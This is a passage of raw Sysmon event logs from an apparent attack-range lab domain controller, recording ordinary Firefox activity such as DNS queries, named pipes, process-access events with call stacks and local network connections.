12:30:36.779{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304cs9.wac.phicdn.net072.21.91.29;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048359Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.770{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.detectportal.prod.cloudops.mozgcp.net02600:1901:0:38d7::;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048358Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.769{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304prod.detectportal.prod.cloudops.mozgcp.net034.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000048357Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:36.768{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304detectportal.firefox.com0type: 5 detectportal.prod.mozaws.net;type: 5 prod.detectportal.prod.cloudops.mozgcp.net;::ffff:34.107.221.82;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048356Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.114{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048355Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.112{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048354Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.101{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048353Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.101{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048352Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.099{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048351Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.098{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048350Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.090{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-5C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048349Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.090{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-5C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048348Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048347Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.088{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000048346Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.976{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcpfalsefalse127.0.0.1-56487-false127.0.0.1-56486- 354300x800000000000000048345Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:35.976{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse127.0.0.1-56487-false127.0.0.1-56486- 10341000x800000000000000048344Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.080{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048343Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.078{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048342Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.077{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-4C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.077{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-4C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.074{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.071{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.17725912354542510538C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.071{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.17725912354542510538C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.070{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.070{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.7.30591850C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.068{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.068{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000048333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.067{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.067{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.067{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E66D-63C7-A006-00000000AF02}6536C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000048330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.064{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.064{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.060{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.058{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-3C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.058{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\LOCAL\cubeb-pipe-3304-3C:\Program Files\Mozilla Firefox\firefox.exe 18141800x800000000000000048325Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.057{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.1665873254295299275C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048324Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.057{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.1665873254295299275C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.056{FE4C2B44-E66B-63C7-9B06-00000000AF02}33045548C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.056{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\chrome.3304.6.117887253C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.051{FE4C2B44-E66B-63C7-9B06-00000000AF02}33046440C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A206-00000000AF02}5460C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.051{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko-crash-server-pipe.3304C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.041{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326916C:\Windows\system32\svchost.exe{FE4C2B44-E66D-63C7-A106-00000000AF02}876C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000048318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:30:38.038{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.6990116616969997798C:\Program Files\Mozilla Firefox\firefox.exe 17141700x800000000000000048317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:30:38.038{FE4C2B44-E66B-63C7-9B06-00000000AF02}3304\gecko.3304.5548.6990116616969997798C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000048316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:38.037{FE4C2B44-E66B-63C7-9B06-00000000AF02}33044516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E66E-63C7-A306-00000000AF02}1712C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program 